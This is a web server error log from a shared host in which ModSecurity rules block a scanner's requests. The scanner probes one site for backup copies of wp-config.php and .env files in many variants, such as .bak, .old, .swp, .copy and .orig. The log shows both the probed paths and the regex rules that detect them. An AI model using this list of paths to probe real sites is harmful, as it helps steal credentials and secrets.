[Tue May 26 17:15:38.679079 2026] [security2:error] [pid 869189:tid 869429] [client 207.241.173.124:42196] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlQwAAAG0"]
[Tue May 26 17:15:39.138174 2026] [security2:error] [pid 869189:tid 869387] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlVAAAAEM"]
[Tue May 26 17:15:39.362734 2026] [security2:error] [pid 869189:tid 869418] [client 207.241.173.124:42208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlTAAAAGI"]
[Tue May 26 17:15:39.368812 2026] [security2:error] [pid 869189:tid 869324] [client 207.241.173.124:42180] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlSAAAAAQ"]
[Tue May 26 17:15:39.369341 2026] [security2:error] [pid 869189:tid 869322] [client 207.241.173.124:42198] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlSQAAAAI"]
[Tue May 26 17:15:39.369390 2026] [security2:error] [pid 869189:tid 869382] [client 207.241.173.124:42082] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlRwAAAD4"]
[Tue May 26 17:15:39.383995 2026] [security2:error] [pid 869189:tid 869432] [client 207.241.173.124:42218] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlSgAAAHA"]
[Tue May 26 17:15:39.398396 2026] [security2:error] [pid 869189:tid 869391] [client 207.241.173.124:42220] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlTQAAAEc"]
[Tue May 26 17:15:39.398927 2026] [security2:error] [pid 869189:tid 869329] [client 207.241.173.124:42226] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlTgAAAAk"]
[Tue May 26 17:15:39.399042 2026] [security2:error] [pid 869189:tid 869434] [client 207.241.173.124:42150] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlSwAAAHI"]
[Tue May 26 17:15:39.399295 2026] [security2:error] [pid 869189:tid 869414] [client 207.241.173.124:42090] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlVQAAAF4"]
[Tue May 26 17:15:40.635669 2026] [core:crit] [pid 869189:tid 869415] (13)Permission denied: [client 157.55.39.16:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:15:41.330667 2026] [security2:error] [pid 869189:tid 869441] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWH5NB5TZSn88J_orrlvwAAAHk"]
[Tue May 26 17:15:41.694361 2026] [security2:error] [pid 869189:tid 869337] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWH5dB5TZSn88J_orrl4wAAABE"], referer: https://www.anujtradingco.com/
[Tue May 26 17:15:42.125900 2026] [security2:error] [pid 869189:tid 869366] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH5dB5TZSn88J_orrl5gAAAC4"]
[Tue May 26 17:15:42.442631 2026] [security2:error] [pid 869189:tid 869422] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWH5tB5TZSn88J_orrl-AAAAGY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1287715&moderation-hash=91a889ac70362414dd8d3d7063359890
[Tue May 26 17:15:42.681464 2026] [security2:error] [pid 869189:tid 869374] [client 207.241.173.124:42128] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH5tB5TZSn88J_orrmBAAAADY"]
[Tue May 26 17:15:42.855395 2026] [security2:error] [pid 869189:tid 869346] [client 207.241.173.124:42136] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-config.php.bak"] [unique_id "ahWH5tB5TZSn88J_orrmEAAAABo"]
[Tue May 26 17:15:42.885470 2026] [security2:error] [pid 869189:tid 869358] [client 207.241.173.124:42098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 124.173.241.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.wp-config.php.swp"] [unique_id "ahWH5tB5TZSn88J_orrmDAAAACY"]
[Tue May 26 17:15:42.914055 2026] [security2:error] [pid 869189:tid 869406] [client 207.241.173.124:42116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 124.173.241.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-config.php"] [unique_id "ahWH5tB5TZSn88J_orrmEQAAAFY"]
[Tue May 26 17:15:43.138415 2026] [security2:error] [pid 869189:tid 869345] [client 207.241.173.124:42128] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-config.php.old"] [unique_id "ahWH59B5TZSn88J_orrmGgAAABk"]
[Tue May 26 17:15:43.272338 2026] [security2:error] [pid 869189:tid 869413] [client 152.59.41.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWH59B5TZSn88J_orrmIgAAAF0"], referer: https://www.ucdc.co.in/
[Tue May 26 17:15:43.295239 2026] [autoindex:error] [pid 869189:tid 869402] [client 152.59.41.98:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:15:43.565658 2026] [security2:error] [pid 869189:tid 869383] [client 114.119.138.230:25031] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/episodes/unfaithfully-yours-the-struggle-series/"] [unique_id "ahWH59B5TZSn88J_orrmKwAAAD8"], referer: https://preetishah.com/episodes/the-predicament-of-an-over-giver-the-struggle-series
[Tue May 26 17:15:43.569009 2026] [security2:error] [pid 869189:tid 869425] [client 207.241.173.124:42334] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-config.php~"] [unique_id "ahWH59B5TZSn88J_orrmLAAAAGk"]
[Tue May 26 17:15:43.569209 2026] [security2:error] [pid 869189:tid 869415] [client 207.241.173.124:42304] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-config.php.save"] [unique_id "ahWH59B5TZSn88J_orrmLQAAAF8"]
[Tue May 26 17:15:44.124332 2026] [security2:error] [pid 869189:tid 869382] [client 216.213.24.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWH6NB5TZSn88J_orrmPgAAAD4"], referer: https://www.anujtradingco.com/
[Tue May 26 17:15:44.230328 2026] [security2:error] [pid 869189:tid 869440] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH59B5TZSn88J_orrmMwAAAHg"]
[Tue May 26 17:15:44.562164 2026] [security2:error] [pid 869189:tid 869361] [client 207.241.173.124:42372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.production.copy"] [unique_id "ahWH6NB5TZSn88J_orrmUAAAACk"]
[Tue May 26 17:15:44.599251 2026] [security2:error] [pid 869189:tid 869384] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWH6NB5TZSn88J_orrmSwAAAEA"], referer: https://anujtradingco.com
[Tue May 26 17:15:44.674730 2026] [security2:error] [pid 869189:tid 869428] [client 207.241.173.124:42358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH6NB5TZSn88J_orrmUQAAAGw"]
[Tue May 26 17:15:44.674735 2026] [security2:error] [pid 869189:tid 869343] [client 207.241.173.124:42342] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH6NB5TZSn88J_orrmUgAAABc"]
[Tue May 26 17:15:44.684670 2026] [security2:error] [pid 869189:tid 869347] [client 207.241.173.124:42318] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH6NB5TZSn88J_orrmUwAAABs"]
[Tue May 26 17:15:45.540525 2026] [security2:error] [pid 869189:tid 869336] [client 207.241.173.124:42372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.bak"] [unique_id "ahWH6dB5TZSn88J_orrmdQAAABA"]
[Tue May 26 17:15:45.633722 2026] [core:crit] [pid 869189:tid 869387] (13)Permission denied: [client 52.167.144.232:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:15:45.760469 2026] [security2:error] [pid 869189:tid 869321] [client 207.241.173.124:42318] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH6dB5TZSn88J_orrmeQAAAAE"]
[Tue May 26 17:15:45.762447 2026] [security2:error] [pid 869189:tid 869321] [client 207.241.173.124:42372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.old"] [unique_id "ahWH6dB5TZSn88J_orrmgAAAAAE"]
[Tue May 26 17:15:46.000463 2026] [core:crit] [pid 869189:tid 869435] (13)Permission denied: [client 52.167.144.232:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:15:46.046920 2026] [security2:error] [pid 869189:tid 869347] [client 207.241.173.124:42342] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH6dB5TZSn88J_orrmgwAAABs"]
[Tue May 26 17:15:46.050339 2026] [security2:error] [pid 869189:tid 869444] [client 207.241.173.124:42358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH6dB5TZSn88J_orrmhAAAAHw"]
[Tue May 26 17:15:46.470312 2026] [security2:error] [pid 869189:tid 869409] [client 207.241.173.124:42432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env~"] [unique_id "ahWH6tB5TZSn88J_orrmmgAAAFk"]
[Tue May 26 17:15:46.470315 2026] [security2:error] [pid 869189:tid 869343] [client 207.241.173.124:42614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.local.bak"] [unique_id "ahWH6tB5TZSn88J_orrmmQAAABc"]
[Tue May 26 17:15:46.470853 2026] [security2:error] [pid 869189:tid 869381] [client 207.241.173.124:42450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.orig"] [unique_id "ahWH6tB5TZSn88J_orrmmwAAAD0"]
[Tue May 26 17:15:46.471758 2026] [security2:error] [pid 869189:tid 869324] [client 207.241.173.124:42402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.swp"] [unique_id "ahWH6tB5TZSn88J_orrmnAAAAAQ"]
[Tue May 26 17:15:46.473223 2026] [security2:error] [pid 869189:tid 869403] [client 207.241.173.124:42612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.production.orig"] [unique_id "ahWH6tB5TZSn88J_orrmnQAAAFM"]
[Tue May 26 17:15:46.536137 2026] [security2:error] [pid 869189:tid 869386] [client 207.241.173.124:42568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.production.old"] [unique_id "ahWH6tB5TZSn88J_orrmogAAAEI"]
[Tue May 26 17:15:46.536599 2026] [security2:error] [pid 869189:tid 869359] [client 207.241.173.124:42556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.production.bak"] [unique_id "ahWH6tB5TZSn88J_orrmpQAAACc"]
[Tue May 26 17:15:46.536692 2026] [security2:error] [pid 869189:tid 869427] [client 207.241.173.124:42604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.production.swp"] [unique_id "ahWH6tB5TZSn88J_orrmpAAAAGs"]
[Tue May 26 17:15:46.541341 2026] [security2:error] [pid 869189:tid 869384] [client 207.241.173.124:42480] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.local.old"] [unique_id "ahWH6tB5TZSn88J_orrmpgAAAEA"]
[Tue May 26 17:15:46.542449 2026] [security2:error] [pid 869189:tid 869385] [client 207.241.173.124:42526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.local.swp"] [unique_id "ahWH6tB5TZSn88J_orrmqAAAAEE"]
[Tue May 26 17:15:46.542505 2026] [security2:error] [pid 869189:tid 869404] [client 207.241.173.124:42544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.local.copy"] [unique_id "ahWH6tB5TZSn88J_orrmpwAAAFQ"]
[Tue May 26 17:15:46.542946 2026] [security2:error] [pid 869189:tid 869361] [client 207.241.173.124:42442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.production.backup"] [unique_id "ahWH6tB5TZSn88J_orrmqQAAACk"]
[Tue May 26 17:15:46.543408 2026] [security2:error] [pid 869189:tid 869333] [client 207.241.173.124:42464] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.production~"] [unique_id "ahWH6tB5TZSn88J_orrmqgAAAA0"]
[Tue May 26 17:15:46.544758 2026] [security2:error] [pid 869189:tid 869399] [client 207.241.173.124:42472] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.local~"] [unique_id "ahWH6tB5TZSn88J_orrmqwAAAE8"]
[Tue May 26 17:15:46.637238 2026] [security2:error] [pid 869189:tid 869352] [client 207.241.173.124:42496] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.local.backup"] [unique_id "ahWH6tB5TZSn88J_orrmsAAAACA"]
[Tue May 26 17:15:46.637290 2026] [security2:error] [pid 869189:tid 869362] [client 207.241.173.124:42536] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.local.orig"] [unique_id "ahWH6tB5TZSn88J_orrmrwAAACo"]
[Tue May 26 17:15:46.637907 2026] [security2:error] [pid 869189:tid 869331] [client 207.241.173.124:42414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.copy"] [unique_id "ahWH6tB5TZSn88J_orrmsQAAAAs"]
[Tue May 26 17:15:46.639457 2026] [security2:error] [pid 869189:tid 869396] [client 207.241.173.124:42394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env.backup"] [unique_id "ahWH6tB5TZSn88J_orrmswAAAEw"]
[Tue May 26 17:15:46.647867 2026] [security2:error] [pid 869189:tid 869380] [client 207.241.173.124:42594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH6tB5TZSn88J_orrmoQAAADw"]
